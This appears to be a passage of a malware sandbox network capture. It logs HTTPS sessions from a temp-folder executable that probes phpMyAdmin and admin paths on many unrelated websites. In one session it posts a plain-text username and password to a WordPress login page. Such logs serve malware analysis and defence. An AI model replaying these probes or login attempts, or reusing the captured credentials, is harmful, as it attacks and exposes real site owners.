6f 6e 20 c3 a8 20 73 74 61 Data Ascii: <!doctype html><html lang="it" style="visibility:hidden;opacity:0;"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>La pagina non sta
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 34 37 2c 30 6c 30 2c 32 31 2e 33 31 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 30 2e 35 36 36 63 30 2c 2d 32 2e 37 38 39 20 30 2e 35 31 35 2c 2d 35 2e 34 38 38 20 33 2e 39 37 38 2c 2d 35 2e 34 38 38 63 33 2e 34 36 33 2c 30 20 33 2e 34 32 37 2c 33 2e 31 39 37 20 33 2e 34 32 37 2c 35 2e 36 36 35 6c 30 2c 31 30 2e 33 38 39 6c 36 2e 36 32 34 2c 30 6c 30 2c 2d 31 31 2e 37 32 31 63 30 2c 2d 35 2e 37 33 36 20 2d 31 2e 32 32 35 2c 2d 31 30 2e 31 35 37 20 2d 37 2e 39 33 38 2c 2d 31 30 2e 31 35 37 5a 6d 2d 32 30 2e 31 39 31 2c 2d 31 30 2e 30 38 37 63 2d 30 2e 30 30 36 2c 30 20 2d 30 2e 30 31 32 2c 30 20 2d 30 2e 30 31 37 2c 30 63 2d 32 2e 31 31 34 2c 30 20 2d 33 2e 38 35 34 2c 31 2e 37 34 20 2d 33 2e 38 35 34 2c 33 2e 38 35 34 63 30 2c 32 2e 31 31 33 20 31 2e 37 34 2c Data Ascii: 47,0l0,21.31l6.624,0l0,-10.566c0,-2.789 0.515,-5.488 3.978,-5.488c3.463,0 3.427,3.197 3.427,5.665l0,10.389l6.624,0l0,-11.721c0,-5.736 -1.225,-10.157 -7.938,-10.157Zm-20.191,-10.087c-0.006,0 -0.012,0 -0.017,0c-2.114,0 -3.854,1.74 -3.854,3.854c0,2.113 1.74,
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 35 2e 33 39 2c 30 63 2d 30 2e 36 36 34 2c 2d 31 2e 38 35 39 20 2d 32 2e 34 32 33 2c 2d 33 2e 32 20 2d 34 2e 35 30 36 2c 2d 33 2e 32 63 2d 32 2e 30 38 33 2c 30 20 2d 33 2e 38 34 32 2c 31 2e 33 34 31 20 2d 34 2e 35 30 34 2c 33 2e 32 6c 2d 31 2e 38 39 36 2c 30 6c 30 2c 2d 31 2e 36 63 30 2c 2d 31 2e 37 36 36 20 31 2e 34 33 35 2c 2d 33 2e 32 20 33 2e 32 2c 2d 33 2e 32 6c 32 32 2e 32 37 32 2c 30 63 30 2e 30 37 35 2c 30 2e 35 32 35 20 30 2e 31 32 38 2c 31 2e 30 35 36 20 30 2e 31 32 38 2c 31 2e 36 6c 30 2c 33 2e 32 5a 22 0a 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 22 20 2f 3e 0a 20 20 20 20 Data Ascii: .2c-2.083,0 -3.842,1.341 -4.504,3.2l-5.39,0c-0.664,-1.859 -2.423,-3.2 -4.506,-3.2c-2.083,0 -3.842,1.341 -4.504,3.2l-1.896,0l0,-1.6c0,-1.766 1.435,-3.2 3.2,-3.2l22.272,0c0.075,0.525 0.128,1.056 0.128,1.6l0,3.2Z" style="fill-rule:nonzero;" />
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 22 4d 32 32 2e 34 32 2c 30 6c 36 2e 36 37 31 2c 36 2e 36 37 31 6c 30 2c 32 32 2e 34 32 63 30 2c 31 2e 36 30 36 20 2d 31 2e 33 30 35 2c 32 2e 39 30 39 20 2d 32 2e 39 30 39 2c 32 2e 39 30 39 6c 2d 32 30 2e 33 36 34 2c 30 63 2d 31 2e 36 30 34 2c 30 20 2d 32 2e 39 30 39 2c 2d 31 2e 33 30 33 20 2d 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 30 2c 2d 32 36 2e 31 38 32 63 30 2c 2d 31 2e 36 30 34 20 31 2e 33 30 35 2c 2d 32 2e 39 30 39 20 32 2e 39 30 39 2c 2d 32 2e 39 30 39 6c 31 36 2e 36 30 32 2c 30 5a 6d 33 2e 37 36 33 2c 32 39 2e 30 39 31 6c 2d 30 2e 30 30 31 2c 2d 32 30 2e 33 36 34 6c 2d 35 2e 38 31 38 2c 30 6c 30 2c 2d 35 2e 38 31 38 6c 2d 31 34 2e 35 34 36 2c 30 6c 30 2c 32 36 2e 31 38 32 6c 32 30 2e 33 36 35 2c 30 5a 6d 2d 31 33 2e 30 39 32 2c 2d 32 2e 39 30 39 Data Ascii: "M22.42,0l6.671,6.671l0,22.42c0,1.606 -1.305,2.909 -2.909,2.909l-20.364,0c-1.604,0 -2.909,-1.303 -2.909,-2.909l0,-26.182c0,-1.604 1.305,-2.909 2.909,-2.909l16.602,0Zm3.763,29.091l-0.001,-20.364l-5.818,0l0,-5.818l-14.546,0l0,26.182l20.365,0Zm-13.092,-2.909
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 6f 66 66 65 72 74 61 2d 66 6f 72 6d 61 74 69 76 61 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4f 66 66 65 72 74 61 20 66 6f 72 6d 61 74 69 76 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 64 69 64 61 74 74 69 63 61 2f 73 63 68 65 64 65 22 20 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 4c 65 20 73 63 68 65 64 65 20 64 69 64 61 74 Data Ascii: href="/didattica/offerta-formativa" tabindex="-1">Offerta formativa</a> </li> <li > <a href="/didattica/schede" tabindex="-1">Le schede didat
2024-02-20 23:26:19 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 61 64 67 65 20 62 61 64 67 65 2d 73 6d 20 62 61 64 67 65 2d 70 69 6c 6c 20 62 61 64 67 65 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 22 20 6e 61 6d 65 3d 22 63 65 72 63 61 22 20 76 61 6c 75 65 3d 22 41 6c 75 6e 6e 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 6c 75 6e 6e 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a Data Ascii: <button type="submit" class="badge badge-sm badge-pill badge-outline-primary" name="cerca" value="Alunni"> Alunni </button>
2024-02-20 23:26:19 UTC	16334	IN	Data Raw: 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 20 2d 20 6c 69 6e 6b 20 65 73 74 65 72 6e 6f 20 2d 20 61 70 65 72 74 75 72 61 20 6e 75 6f 76 61 20 73 63 68 65 64 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 61 6c 74 3d 22 41 6c 62 6f 20 6f 6e 6c 69 6e 65 22 20 73 72 63 3d 22 2f 61 6c 6c 65 67 61 74 69 2f 62 61 Data Ascii: ener noreferrer" aria-label="Albo online - link esterno - apertura nuova scheda"> ... <div class="icon d-inline-block"> <img class="img-fluid" alt="Albo online" src="/allegati/ba
2024-02-20 23:26:19 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.6	51756	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	175	OUT	GET /pma/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:18 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:18 UTC	15975	IN	Data Raw: 39 45 33 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 9E3C<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:18 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:18 UTC	8162	IN	Data Raw: 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d Data Ascii: i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.info/wp-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
244	192.168.2.6	51988	85.13.138.112	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	165	OUT	GET /admin HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:18 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:18 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
245	192.168.2.6	52075	13.232.255.130	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	354	OUT	POST /wp-login.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://amsantechnology.com/wp-login.php Content-Length: 136 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:18 UTC	136	OUT	Data Raw: 6c 6f 67 3d 73 61 6e 74 6f 73 68 26 70 77 64 3d 65 64 65 34 64 65 6c 65 63 35 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=santosh&pwd=ede4delec5a&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Famsantechnology.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:18 UTC	375	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:18 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:18 UTC	6584	IN	Data Raw: 31 39 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 41 6d 73 61 6e 20 54 65 63 68 6e 6f 6c 6f 67 79 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: 19ab<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Amsan Technology — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='style

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
246	192.168.2.6	52602	45.147.96.4	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	349	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: https://www.glazing-bt.com Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
247	192.168.2.6	52590	85.214.145.11	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	166	OUT	GET /pma/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	448	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/" Server-Timing: wp-before-template;dur=288.11, wp-before-template-db-queries;dur=9.57
2024-02-20 23:26:19 UTC	15936	IN	Data Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 Data Ascii: 1dc8<!DOCTYPE html><html lang="de-DE" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This
2024-02-20 23:26:19 UTC	16384	IN	Data Raw: 4b 5a 22 3a 22 4b 61 73 61 63 68 73 74 61 6e 22 2c 22 51 41 22 3a 22 4b 61 74 61 72 22 2c 22 4b 45 22 3a 22 4b 65 6e 69 61 22 2c 22 4b 47 22 3a 22 4b 69 72 67 69 73 69 73 74 61 6e 22 2c 22 4b 49 22 3a 22 4b 69 72 69 62 61 74 69 22 2c 22 55 4d 22 3a 22 4b 6c 65 69 6e 65 72 65 20 49 6e 73 65 6c 62 65 73 69 74 7a 75 6e 67 65 6e 20 64 65 72 20 56 65 72 65 69 6e 69 67 74 65 6e 20 53 74 61 61 74 65 6e 22 2c 22 43 43 22 3a 22 4b 6f 6b 6f 73 69 6e 73 65 6c 6e 22 2c 22 43 4f 22 3a 22 4b 6f 6c 75 6d 62 69 65 6e 22 2c 22 4b 4d 22 3a 22 4b 6f 6d 6f 72 65 6e 22 2c 22 43 47 22 3a 22 4b 6f 6e 67 6f 22 2c 22 43 44 22 3a 22 4b 6f 6e 67 6f 2c 20 44 65 6d 6f 6b 72 61 74 69 73 63 68 65 20 52 65 70 75 62 6c 69 6b 22 2c 22 4b 52 22 3a 22 4b 6f 72 65 61 22 2c 22 48 52 22 3a 22 Data Ascii: KZ":"Kasachstan","QA":"Katar","KE":"Kenia","KG":"Kirgisistan","KI":"Kiribati","UM":"Kleinere Inselbesitzungen der Vereinigten Staaten","CC":"Kokosinseln","CO":"Kolumbien","KM":"Komoren","CG":"Kongo","CD":"Kongo, Demokratische Republik","KR":"Korea","HR":"
2024-02-20 23:26:19 UTC	15044	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d Data Ascii: ransform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
248	192.168.2.6	52647	178.33.253.225	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:18 UTC	161	OUT	GET /pma/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:19 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:19 UTC	16040	IN	Data Raw: 31 65 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 26 23 38 32 31 31 3b 20 43 46 43 41 20 26 23 38 32 31 31 3b 20 43 61 62 69 6e 65 74 20 64 26 23 30 Data Ascii: 1ec3<!doctype html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page non trouve – CFCA – Cabinet d&#0
